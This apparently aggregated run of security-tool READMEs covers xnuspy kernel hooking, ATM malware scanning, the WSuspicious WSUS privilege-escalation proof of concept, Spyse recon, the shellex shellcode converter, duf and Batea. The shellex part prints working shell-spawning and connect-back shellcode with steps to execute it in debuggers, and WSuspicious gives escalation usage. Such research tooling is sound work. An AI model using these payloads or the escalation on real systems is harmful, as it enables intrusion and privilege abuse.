xnuspy uses X16 and X17 for its trampolines, so kernel functions which expect those to persist across function calls cannot be hooked (there aren't many which expect this). If the function you want to hook begins with BL, and you intend to call the original, you can only do so if executing the original function does not modify X17.


Thread-safety

xnuspy_ctl will perform one-time initialization the first time it is called after a fresh boot. This is the only part of xnuspy which is raceable since I can't statically initialize the read/write lock I use. After the first call returns, any future calls are guaranteed to be thread-safe.


How It Works

This is simplified, but it captures the main idea well. A function hook in xnuspy is a structure that resides on writeable, executable kernel memory. In most cases, this is memory returned by alloc_static inside of pongoOS. It can be boiled down to this:

struct {
    uint64_t replacement;
    uint32_t tramp[2];
    uint32_t orig[10];
};

Where replacement is the kernel virtual address (elaborated on later) of the replacement function, tramp is a small trampoline that re-directs execution to replacement, and orig is a larger, more complicated trampoline that represents the original function.

Before a function is hooked, xnuspy creates a shared user-kernel mapping of the calling process's __TEXT and __DATA segments (as well as any segments in between, if any). __TEXT is shared so you can call other functions from your hooks. __DATA is shared so changes to global variables are seen by both EL1 and EL0. This is done only once per process.

Since this mapping is a one-to-one copy of __TEXT and __DATA, it's easy to figure out the address of the user's replacement function on it. Given the address of the calling process's Mach-O header u, the address of the start of the shared mapping k, and the address of the user's replacement function r, we apply the following formula: replacement = k + (r - u)

After that, replacement is the kernel virtual address of the user's replacement function on the shared mapping and it is written to the function hook structure. xnuspy does not re-direct execution to the EL0 address of the replacement function because that's extremely unsafe: not only does that put us at the mercy of the scheduler, it gives us no control over the scenario where a process with a kernel hook dies while a kernel thread is still executing on the replacement.

Finally, the shared mapping is marked as executable* and an unconditional immediate branch (B) is assembled. It directs execution to the start of tramp, and is what replaces the first instruction of the now-hooked kernel function. Unfortunately, this limits us from branching to hook structures more than 128 MB away from a given kernel function. xnuspy checks for this scenario before booting and, if it finds that this could happen, falls back to unused code already in the kernelcache for the hook structures to reside on instead.

*not exactly what happens, what actually happens produces that effect


Device Security

This module completely neuters KTRR/AMCC lockdown and KPP. I don't recommend using this on a daily driver.


Other Notes

I do my best to make sure the patchfinders work, so if something isn't working please open an issue.



ATMMalScan - Tool for Windows which helps to search for malware traces on an ATM during the DFIR process



ATMMalScan is a command-line tool for Windows operating systems, version 7 and higher, which helps search for malware traces on an ATM during the DFIR process. This tool examines the running processes of a system, as well as the hard disk, depending on the specified file path. To scan a system, a user with standard rights is sufficient; however, ATMMalScan provides the best results with administrator privileges.


Known issues:

ATMMalScan currently does not support code pages that require Unicode; on Windows operating systems that are set to e.g. Cyrillic or Chinese characters, no representative result can be guaranteed.


Requirements:

Make sure at least the Visual C++ Redistributable for Visual Studio 2015 has been installed on the ATM you would like to scan.


Usage (Example)

Step1 => Scan process memory and disk. ===> Check if Admin privileges are available on the device for best results!



Step2 => ATMMalScan detected malware called XFS_DIRECT in a process and gives details about the thread and its rule matches. Furthermore, a full process memory dump has been saved to disk to capture the malicious process, its modules, as well as its stack and heap pages.



Step3 => Dump can be found here => .\Dump



Step4 => Open the dump file with WinDbg and extract the ATM malware to disk using ".writemem"
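
For reference, .writemem takes a destination file and a memory range; an extraction from the loaded dump could look like this (a hedged sketch; the output path, start address and length are placeholders you would take from the dump itself):

.writemem C:\Dump\extracted_malware.bin 0x00400000 L?0x1F000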



Step5 => Repair the dumped PE with one of your favorite PE-Fixers and start analysing the malware in detail.




WSuspicious - A Tool To Abuse Insecure WSUS Connections For Privilege Escalations



This is a proof of concept program to escalate privileges on a Windows host by abusing WSUS. Details are in this blog post: https://www.gosecure.net/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/ It was inspired by the WSuspect proxy project: https://github.com/ctxis/wsuspect-proxy


Acknowledgements

Privilege escalation module written by Maxime Nadeau from GoSecure

Huge thanks to:

  • Julien Pineault from GoSecure and Mathieu Novis from SecureOps for reviving the WSUS proxy attack
  • Romain Carnus from GoSecure for coming up with the HTTPS interception idea
  • Paul Stone and Alex Chapman from Context Information Security for writing and researching the original proxy PoC

Usage

The tool was tested on Windows 10 machines (10.0.17763 and 10.0.18363) in different domain environments.

Usage: WSuspicious [OPTION]...
Ex. WSuspicious.exe /command:"" - accepteula - s - d cmd / c """"echo 1 > C:\\wsuspicious.txt"""""" /autoinstall

Creates a local proxy to intercept WSUS requests and try to escalate privileges.
If launched without any arguments, the script will simply create the file C:\\wsuspicious.was.here

/exe The full path to the executable to run
Known payloads are bginfo and PsExec. (Default: .\PsExec64.exe)
/command The command to execute (Default: -accepteula -s -d cmd /c ""echo 1 > C:\\wsuspicious.was.here"")
/proxyport The port on which the proxy is started. (Default: 13337)
/downloadport The port on which the web server hosting the payload is started. (Sometimes useful for older Windows versions)
If not specified, the server will try to intercept the request to the legitimate server instead.
/debug Increase the verbosity of the tool
/autoinstall Start Windows updates automatically after the proxy is started.
/enabletls Enable HTTPS interception. WARNING. NOT OPSEC SAFE.
This will prompt the user to add the certificate to the trusted root.
/help Display this help and exit

Compilation

The ILMerge dependency can be used to compile the application into a standalone .exe file. To compile the application, simply use the following command:

dotnet msbuild /t:Restore /t:Clean /t:Build /p:Configuration=Release /p:DebugSymbols=false /p:DebugType=None /t:ILMerge /p:TrimUnusedDependencies=true


Recon Simplified with Spyse


One of the major struggles in bug bounty hunting is to collect and analyze data during reconnaissance, especially when there are a lot of tools around but very few that offer actually useful results. The job of eliminating false positives and unrelated data from your recon becomes harder as the size of your target increases.

Most popular tools used by bug bounty hunters like Knockpy, Sublist3r, and Subfinder are command line based and often difficult to use when the size of the target becomes bigger. With a lot of results provided, it becomes harder and takes longer to filter out the most important ones, remove unnecessary results, and pick the right investigation vector. However, some companies are still trying to simplify the recon process by rethinking old approaches and implementing UI/UX and technical features.

Spyse is that reconnaissance automation framework that every bug bounty hunter should test at least once.

Reconnaissance process

At the core of reconnaissance are OSINT and data analysis: one needs to analyze a target and map out its infrastructure efficiently.

To become familiar with your target's attack surface, you need to perform recon in a proper manner and gather information about its assets. For that, it's crucial to enumerate all the assets belonging to the investigated target (domains, sub-domains, IP address, etc) and related assets, basically everything that is closely connected to the main target.

By doing it precisely, anyone can easily spot the low hanging fruits such as sub-domain takeovers that can have a huge impact.

Spyse is the tool that simplifies this process and makes your routine work easier by storing all needed information in one place and pointing where to look first.

Faster Reconnaissance

Be the fastest in reaching your target's assets. Bug Bounty Hunting is a rat race – the faster you are able to fully analyze your target's attack surface, the more the chances of scoring a bounty. There is competition in every field, but with close to a million bug bounty hunters working across platforms – at any given time there may be hundreds of thousands of bug bounty hunters working on a specific target of a bug bounty program, which leads us to the biggest hurdle – time.

If you are not able to optimize your reconnaissance workflow and reduce the time you spend on your targets, you will lag behind the others. If you are at par with the others, and stick to the usual tools, you still stay average – but with an industry-leading solution like Spyse, you not just become fast but faster than the others.

With Spyse, it's just a plug-and-play operation. It has all the necessary data about your targets already collected, even before you begin to hunt on a target, and the advanced search filter mechanism is way better than most command-line based open source tools.

Doing Recon on New Targets has never been easier

If you run the traditional tools just after you get access to a new target, it might take days just to collect the data on larger targets, and yet more time to analyze and make sense of it. Spyse's advanced search feature can get you to the same results in a fraction of a second.

You can search for information about your target domain name (say, Target.com), from Spyse's collection of over 4.5B domain name records, all indexed.


Search your target in over 25TB database.


Not just another Cybersecurity Search Engine

Spyse is not just another cybersecurity search engine; it's an advanced yet simple reconnaissance framework of sorts. Unlike Censys and Shodan, Spyse offers a user-friendly filter which doesn't make use of advanced query syntax, dorks, etc. Spyse's advanced search feature is aimed to be simple to use, user friendly yet efficient and precise. The advanced search lets you hit your goal by tuning the search parameters to exactly the targets you are after, minimizing false positives and inaccurate results.


Advanced Search Filter to find Apache servers belonging to a target

For example, if you are looking for Apache servers in a particular target's infrastructure, you can set the search filters to match your target's Organization name (domain name or, AS or, IP ranges) and add another filter, Site info > HTTP Header > Name and Value to Server and Apache respectively, and let the backend handle the rest for you.

The Database


Spyse has collected and indexed over 4.5B domains

Spyse has gathered data of over 217.1M hosts with open ports, indexed 4.5B domains, 66M SSL/TLS certificates, 371M email-related data, 143.7K vulnerabilities, 1.2M organizations and more. Learn more about their data statistics here.

Having to deal with so much data on large scope bug bounty targets during recon makes it incredibly difficult and tedious to scan these assets, and perform reconnaissance at scale. However, Spyse collects and updates this data on a regular basis, and indexes it, making it easier to filter out small bits of information that are important for your recon.

The whole database updates once a week except for some types of data that do not change too often, like domains.

Managing Recon Data

It is difficult to manage vast amounts of gathered information, and Spyse has taken care of it. Some hunters who have advanced development knowledge prefer to build their own automation with a proper backend and database of targets, yet they tend to miss out on lots of data and find it hard to manage and correlate it.
However, with Spyse you don't need advanced development skills, because it crawls, collects and connects all the data about your targets.

Developing a web application to manage the whole process might be beneficial but it will cost you lots of work. Nevertheless, you have Spyse that can be implemented with other tools simply through the API connection. This should save the time you would have otherwise spent running only manual command line tools.

Filtering subdomains by Response Code

You can also filter your target's assets by response code (for example – 200 status code, for valid request), which helps you quickly find interesting assets from a large number of target subdomains and domains. This is a very handy feature while doing recon on any target, as it gives you a quick overview of the publicly accessible assets of your target.


Browsing targets by status code (for example, 200 status code)

Export Recon Data in JSON/CSV Format

Spyse has a very handy data export feature that lets you quickly export your scan data in JSON and CSV format. Whether you like to see your data in Excel or, implement it in your own application or, visualize it using ElasticSearch, Spyse has got you covered. It also makes it easier for you to use the exported data with other custom tools (most tools support JSON/CSV data, as its a common format).


Export reconnaissance data in multiple formats – JSON or, CSV

Large Scope

Spyse can easily handle a lot of information. With conventional tools, you can miss a lot of information while working on large targets but with Spyse – it's no longer a problem!

Spyse not just gathered an incredibly large dataset of assets, It structured all of them in an understandable and intuitive way with loads of conclusions that indicate vulnerable or just interesting parts of the target.

Find out how everything is connected:

Spyse IP data output


Easily locate related data:

Spyse related data


Understand vulnerability level of the target and explore found vulnerabilities:

Instant Vulnerability assessment of the target


Benefit from ready made conclusion based on data analysis:

Ready-made conclusions made by Spyse


Data Visualization

The web interface lets you visualize your target's data more efficiently and in a better manner than other tools. This helps you take decisions easily, and find vulnerable assets more easily than using conventional tools. With bigger targets like Yahoo having as many as 143.4k sub-domains, using conventional tools like subfinder becomes harder, but with Spyse you can visualize the relationships between different assets, and decide where to spend your time while hunting on the target's assets.


Spyse's advanced data gathering solution gives you an extremely intuitive interface to search through loads of data and offers you a visual approach to dealing with large amounts of recon information.

All Around Solution for OSINT Data Analysis (Conclusion)

Instead of moving back and forth between different tools that give inaccurate data, the stunning UI makes it easier to wade through a sea of OSINT data. Use it for a quick target overview alone or in combination with other tools, and remove all unnecessary manual work.

In conclusion, explore the wide variety of Spyse’s tools that will help you find the exact piece of information you need.



Most necessary tools:

  • Subdomain Finder - Finding sub-domains on large targets is now way easier with their advanced sub-domain finder tool.
  • Reverse IP Lookup - Add more assets to your target's scope with the advanced Reverse IP look up tool, and find vulnerable hosts using Reverse IP Lookups.
  • Port Scanner - Look for open ports on your targets with the advanced port scanner tool, and filter through IP addresses of targets based on open ports.
  • ASN Lookup - To look up ASNs of your bug bounty targets.
  • Company Lookup - Makes it easy to collect data about the acquisitions of your target company, and gives you access to more scope while hunting.










Shellex - C-shellcode To Hex Converter, Handy Tool For Paste And Execute Shellcodes In Gdb, Windbg, Radare2, Ollydbg, X64Dbg, Immunity Debugger And 010 Editor



C-shellcode to hex converter.

Handy tool for pasting & executing shellcodes in gdb, windbg, radare2, ollydbg, x64dbg, immunity debugger & 010 editor.


Are you having problems converting C-shellcodes to HEX (maybe c-comments+ASCII mixed?)

Here is shellex. If the shellcode can be compiled by a C compiler, shellex can convert it.

Just execute shellex, paste the shellcode c-string and press ENTER.

To end, use Control+Z (Windows) / Control+D (Linux).

Converting c-shellcode-multi-line-hex+mixed_ascii (pay attention to the mixed part \x68//sh\x68/bin\x89):

"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"

shellex output:

6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

Converting c-shellcode-multi-line-with-comments:

"\x68"
"\x7f\x01\x01\x01" // <- IP: 127.1.1.1
"\x5e\x66\x68"
"\xd9\x03" // <- Port: 55555
"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"
"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"
"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"
"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\xeb\xce"

shellex output:

68 7F 01 01 01 5E 66 68 D9 03 5F 6A 66 58 99 6A 01 5B 52 53 6A 02 89 E1 CD 80 93 59 B0 3F CD 80 49 79 F9 B0 66 56 66 57 66 6A 02 89 E1 6A 10 51 53 89 E1 CD 80 B0 0B 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 EB CE

Do you need the shellex output as a new c-shellcode-string? just use -h parameter, example converting the shellex output:

./shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80

Installation
git clone https://github.com/David-Reguera-Garcia-Dreg/shellex.git

For Windows:

binary:

shellex\bins\shellex.exe

For Linux

Deps:

sudo apt-get install tcc

binary:

shellex/linuxbins/shellex

Paste & Execute shellcode in ollydbg, x64dbg, immunity debugger

Just use my xshellex plugin:

https://github.com/David-Reguera-Garcia-Dreg/xshellex


Paste & Execute shellcode in gdb
  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
  • write the C-Hex-String to a file as raw binary data with "echo":
echo -ne "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80" > /tmp/sc
  • gdb /bin/ls
  • starti

Write the binary file to the current instruction pointer:

for 32 bits:

restore /tmp/sc binary $eip
x/30b $eip
x/15i $eip

for 64 bits:

restore /tmp/sc binary $rip
x/30b $rip
x/15i $rip

x/30b is the size in bytes of the shellcode, you can get the size with:

wc -c /tmp/sc

x/15i is the number of instructions to display, you can get the correct number (maybe) with ndisasm:

sudo apt-get install nasm

For 32 bits:

ndisasm -b32 /tmp/sc
ndisasm -b32 /tmp/sc | wc -l

For 64 bits:

ndisasm -b64 /tmp/sc
ndisasm -b64 /tmp/sc | wc -l

Paste & Execute shellcode in gdb-gef
  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert with: echo "SPACE shellex_output" | sed "s/ / 0x/g"
echo " 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80" | sed "s/ / 0x/g"

Use patch byte command:

For 32 bits:

patch byte $eip 0x6A 0x17 0x58 0x31 0xDB 0xCD 0x80 0x6A 0x0B 0x58 0x99 0x52 0x68 0x2F 0x2F 0x73 0x68 0x68 0x2F 0x62 0x69 0x6E 0x89 0xE3 0x52 0x53 0x89 0xE1 0xCD 0x80

For 64 bits:

patch byte $rip 0x6A 0x17 0x58 0x31 0xDB 0xCD 0x80 0x6A 0x0B 0x58 0x99 0x52 0x68 0x2F 0x2F 0x73 0x68 0x68 0x2F 0x62 0x69 0x6E 0x89 0xE3 0x52 0x53 0x89 0xE1 0xCD 0x80

Execute context command and check if the disasm is correct


Paste & Execute shellcode in gdb-peda
  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

For 32 bits:

patch $eip "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80"

For 64 bits:

patch $rip "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80"

Execute context command and check if the disasm is correct


Paste & Execute shellcode in windbg
  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D

via eb

For small shellcodes eb works fine; just use the shellex output with the eb command (thanks to Axel Souchet @0vercl0k for the hint).

For 32 bits:

eb @eip 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

For 64 bits:

eb @rip 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80

via file
  • convert the shellex output to raw binary data with certutil:
echo 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80 > C:\Users\Dreg\sc.hex
certutil -f -decodeHex c:\Users\Dreg\sc.hex c:\Users\Dreg\sc
del C:\Users\Dreg\sc.hex

certutil output:

Input Length = 92
Output Length = 30
CertUtil: -decodehex command completed successfully.

The length of our shellcode is 30, so use L0n30 in windbg.
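If certutil is not an option, a minimal Python sketch (a hypothetical helper, not part of shellex) can write the raw bytes and print the size to use in L0n<size>:

# hex_to_bin.py - hypothetical helper, not part of shellex
# Writes space-separated hex bytes to a raw binary file and prints the byte count for L0n<size>.
import sys

def write_raw(hex_bytes: str, out_path: str) -> int:
    data = bytes(int(b, 16) for b in hex_bytes.split())
    with open(out_path, "wb") as fh:
        fh.write(data)
    return len(data)

if __name__ == "__main__":
    size = write_raw(" ".join(sys.argv[2:]), sys.argv[1])
    print("wrote %d bytes -> use L0n%d in windbg" % (size, size))

Example: python hex_to_bin.py C:\Users\Dreg\sc 6A 17 58 31 DB CD 80 ...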

Write the binary file to the current instruction pointer:

for 32 bits:

.readmem C:\Users\Dreg\sc @eip L0n30

for 64 bits:

.readmem C:\Users\Dreg\sc @rip L0n30

Paste & Execute shellcode in radare2
  • execute shellex
  • enter the shellcode:
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
  • press enter
  • press Control+D
  • convert the shellex output to C-Hex-String with shellex -h:
shellex -h 6A 17 58 31 DB CD 80 6A 0B 58 99 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 52 53 89 E1 CD 80
  • write the C-Hex-String in radare2 using the "w" command:

For 32 bits:

w \x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80 @eip

For 64 bits:

w \x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80 @rip

Check that the shellcode was pasted correctly:

Get the size of the shellcode in a terminal with:

echo -ne "\x6A\x17\x58\x31\xDB\xCD\x80\x6A\x0B\x58\x99\x52\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x52\x53\x89\xE1\xCD\x80" | wc -c

The output of the last command is 30. Now use the pD command in radare2:

pD 30

Non-interactive mode

Converting "\x6a\x17\x58\x31\xdb\xcd\x80" in Linux:

echo "\"\\x6a\\x17\\x58\\x31\\xdb\\xcd\\x80\"" | shellex

Converting "\x6a\x17\x58\x31\xdb\xcd\x80" in Windows:

echo "\x6a\x17\x58\x31\xdb\xcd\x80" | shellex.exe

Via multi-line-file in Windows:

C:\Users\Dreg\Desktop\shellex\bins>type sc.txt
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
C:\Users\Dreg\Desktop\shellex\bins>type sc.txt | shellex.exe

Via multi-line-file in Linux:

dreg@fr33project# cat sc.txt
"\x6a\x17\x58\x31\xdb\xcd\x80"
"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"
dreg@fr33project# cat sc.txt | shellex

Compilation

For Windows just use Visual Studio 2013

For Linux just:

cd shellex/shellex
gcc -o shellex shellex.c
./shellex


Duf - Disk Usage/Free Utility (Linux, BSD, macOS & Windows)



Disk Usage/Free Utility (Linux, BSD, macOS & Windows)


Features
  • User-friendly, colorful output
  • Adjusts to your terminal's width
  • Sort the results according to your needs
  • Groups & filters devices
  • Can conveniently output JSON

Installation

Packages

Linux

BSD
  • FreeBSD: pkg install duf

macOS
  • with Homebrew: brew install duf
  • with MacPorts: sudo port selfupdate && sudo port install duf

Windows
  • with scoop: scoop install duf

Android
  • Android (via termux): pkg install duf

Binaries
  • Binaries for Linux, FreeBSD, OpenBSD, macOS, Windows

From source

Make sure you have a working Go environment (Go 1.12 or higher is required). See the install instructions.

Compiling duf is easy, simply run:

git clone https://github.com/muesli/duf.git
cd duf
go build

Usage

You can simply start duf without any command-line arguments:

duf

If you supply arguments, duf will only list specific devices & mount points:

duf /home /some/file

If you want to list everything (including pseudo, duplicate, inaccessible file systems):

duf --all

You can show and hide specific tables:

duf --only local,network,fuse,special,loops,binds
duf --hide local,network,fuse,special,loops,binds

You can also show and hide specific filesystems:

duf --only-fs tmpfs,vfat
duf --hide-fs tmpfs,vfat

Sort the output:

duf --sort size

Valid keys are: mountpoint, size, used, avail, usage, inodes, inodes_used, inodes_avail, inodes_usage, type, filesystem.

Show or hide specific columns:

duf --output mountpoint,size,usage

Valid keys are: mountpoint, size, used, avail, usage, inodes, inodes_used, inodes_avail, inodes_usage, type, filesystem.

List inode information instead of block usage:

duf --inodes

If duf doesn't detect your terminal's colors correctly, you can set a theme:

duf --theme light

If you prefer your output as JSON:

duf --json
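If you want to post-process that JSON, a minimal Python sketch could look like the following (note: the field names mount_point, total and used are assumptions, not taken from the duf documentation; check your own duf --json output and adjust):

# parse_duf.py - hypothetical post-processing sketch, not part of duf
# Runs `duf --json` and prints mount points sorted by usage.
import json
import subprocess

def mounts_by_usage():
    raw = subprocess.run(["duf", "--json"], capture_output=True, text=True, check=True).stdout
    rows = []
    for dev in json.loads(raw):
        total = dev.get("total") or 0          # field name is an assumption
        used = dev.get("used") or 0            # field name is an assumption
        usage = used / total if total else 0.0
        rows.append((dev.get("mount_point", "?"), usage))
    return sorted(rows, key=lambda r: r[1], reverse=True)

if __name__ == "__main__":
    for mount, usage in mounts_by_usage():
        print("%s: %.0f%%" % (mount, usage * 100))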

Troubleshooting

Users of oh-my-zsh should be aware that it already defines an alias called duf, which you will have to remove in order to use duf:

unalias duf



Batea - AI-based, Context-Driven Network Device Ranking



Batea is a context-driven network device ranking framework based on the anomaly detection family of machine learning algorithms. The goal of Batea is to allow security teams to automatically filter interesting network assets in large networks using nmap scan reports. We call those Gold Nuggets.

For more information about Gold Nuggeting and the science behind Batea, check out our whitepaper here

You can try Batea on your nmap scan data without downloading the software, using Batea Live: https://batea.delvesecurity.com/



How it works

Batea works by constructing a numerical representation (numpy) of all devices from your nmap reports (XML) and then applying anomaly detection methods to uncover the gold nuggets. It is easily extendable by adding specific features, or interesting characteristics, to the numerical representation of the network elements.

The numerical representation of the network is constructed using features, which are inspired by the expertise of the security community. The features act as elements of intuition, and the unsupervised anomaly detection methods allow the context of the network asset, or the total description of the network, to be used as the central building block of the ranking algorithm. The exact algorithm used is Isolation Forest (https://en.wikipedia.org/wiki/Isolation_forest)

Machine learning models are the heart of Batea. Models are algorithms trained on the whole dataset and used to predict a score on the same (and other) data points (network devices). Batea also allows for model persistence. That is, you can re-use pretrained models and export models trained on large datasets for further use.
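As a rough illustration of this approach (a minimal sketch, not Batea's actual code; the feature matrix below is invented), an Isolation Forest can be fit on a hosts-by-features matrix and used to rank hosts by anomaly score:

# isolation_forest_sketch.py - illustrative only, not Batea's implementation
# Each row is one host, each column a numeric feature (e.g. open port count, common service flag, OS flag).
import numpy as np
from sklearn.ensemble import IsolationForest

# Hypothetical feature matrix for 6 hosts x 3 features
X = np.array([
    [2, 1, 0],
    [3, 1, 0],
    [2, 0, 0],
    [1, 1, 0],
    [2, 1, 0],
    [25, 0, 1],   # unusual host: many open ports, different OS
])

model = IsolationForest(random_state=0).fit(X)
# Lower (more negative) scores are more anomalous, i.e. more "gold nugget"-like
scores = model.score_samples(X)
print("hosts ranked from most to least anomalous:", np.argsort(scores))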


Usage
# Complete info
$ sudo nmap -A 192.168.0.0/16 -oX output.xml

# Partial info
$ sudo nmap -O -sV 192.168.0.0/16 -oX output.xml


$ batea -v output.xml

Installation
$ git clone git@github.com:delvelabs/batea.git
$ cd batea
$ python3 setup.py sdist
$ pip3 install -r requirements.txt
$ pip3 install -e .

Developers Installation
$ git clone git@github.com:delvelabs/batea.git
$ cd batea
$ python3 -m venv batea/
$ source batea/bin/activate
$ python3 setup.py sdist
$ pip3 install -r requirements-dev.txt
$ pip3 install -e .
$ pytest

Example usage
# simple use (output top 5 gold nuggets with default format)
$ batea nmap_report.xml

# Output top 3
$ batea -n 3 nmap_report.xml

# Output all assets
$ batea -A nmap_report.xml

# Using multiple input files
$ batea -A nmap_report1.xml nmap_report2.xml

# Using wildcards (default xsl)
$ batea ./nmap*.xml
$ batea -f csv ./assets*.csv

# You can use batea on pretrained models and export trained models.

# Training, output and dumping model for persistence
$ batea -D mymodel.batea nmap_report.xml

# Using pretrained model
$ batea -L mymodel.batea nmap_report.xml

# Using preformatted csv along with xml files
$ batea -x nmap_report.xml -c portscan_data.csv

# Adjust verbosity
$ batea -vv nmap_report.xml

How to add a feature

Batea works by assigning numerical features to every host in the report (or series of reports). Hosts are Python objects derived from the nmap report. They have the following attributes: [ipv4, hostname, os_info, ports], where ports is a list of port objects. Each port has the following attributes: [port, protocol, state, service, software, version, cpe, scripts], all defaulting to None.

Features are objects inherited from the FeatureBase class that implement a specific _transform method. This method always takes the list of all hosts as input and returns a lambda function that maps each host to a numpy column of numeric values (host order is preserved). The column is then appended to the matrix representation of the report. Features must output correct numerical values (floats or integers) and nothing else.

Most feature transformations are implemented using a simple lambda function. Just make sure to default a numeric value to every host for model compatibility.

Ex:

class CustomInterestingPorts(FeatureBase):
    def __init__(self):
        super().__init__(name="some_custom_interesting_ports")

    def _transform(self, hosts):
        """This method takes a list of hosts and returns a function that counts the number
        of host ports that are members of a predefined list of "interesting" ports, defaulting to 0.

        Parameters
        ----------
        hosts : list
            The list of all hosts

        Returns
        -------
        f : lambda function
            Counts the number of ports in the defined list.
        """
        member_ports = [21, 22, 25, 8080, 8081, 1234]
        f = lambda host: len([port for port in host.ports if port.port in member_ports])
        return f

You can then add the feature to the report by using the NmapReport.add_feature method in batea/__init__.py

from .features.basic_features import CustomInterestingPorts

def build_report():
    report = NmapReport()
    # [...]
    report.add_feature(CustomInterestingPorts())

    return report

Using precomputed tabular data (CSV)

It is possible to use preprocessed data to train the model or for prediction. The data has to be indexed by (ipv4, port) with one unique combination per row. The type of data should be close to what you expect from the XML version of an nmap report. A column has to use one of the following names, but you don't have to use all of them. The parser defaults to null values if a column is absent.

'ipv4',
'hostname',
'os_name',
'port',
'state',
'protocol',
'service',
'software_banner',
'version',
'cpe',
'other_info'

Example:

ipv4,hostname,os_name,port,state,protocol,service,software_banner
10.251.53.100,internal.delvesecurity.com,Linux,110,open,tcp,rpcbind,"program version port/proto service100000 2,3,4 111/tcp rpcbind100000 2,3,4 "
10.251.53.100,internal.delvesecurity.com,Linux,111,open,tcp,rpcbind,
10.251.53.188,serious.delvesecurity.com,Linux,6000,open,tcp,X11,"X11Probe: CentOS"
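As a rough sketch of how such a file can be consumed (this is not Batea's parser; it only illustrates the default-to-null behaviour described above):

# csv_sketch.py - illustrative only, not Batea's CSV parser
# Reads a portscan CSV and fills in any absent expected column with None.
import csv

EXPECTED = ['ipv4', 'hostname', 'os_name', 'port', 'state', 'protocol',
            'service', 'software_banner', 'version', 'cpe', 'other_info']

def read_rows(path):
    with open(path, newline='') as fh:
        for row in csv.DictReader(fh):
            # Missing columns default to None, mirroring the parser behaviour described above
            yield {col: row.get(col) for col in EXPECTED}

if __name__ == "__main__":
    for entry in read_rows("portscan_data.csv"):
        print(entry["ipv4"], entry["port"], entry["service"])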

Outputting the numerical representation

For the data scientist in you, or just for fun and profit, you can output the numerical matrix along with the score column instead of the regular output. This can be useful for further data analysis and debugging purposes.

$ batea -oM network_matrix nmap_report.xml


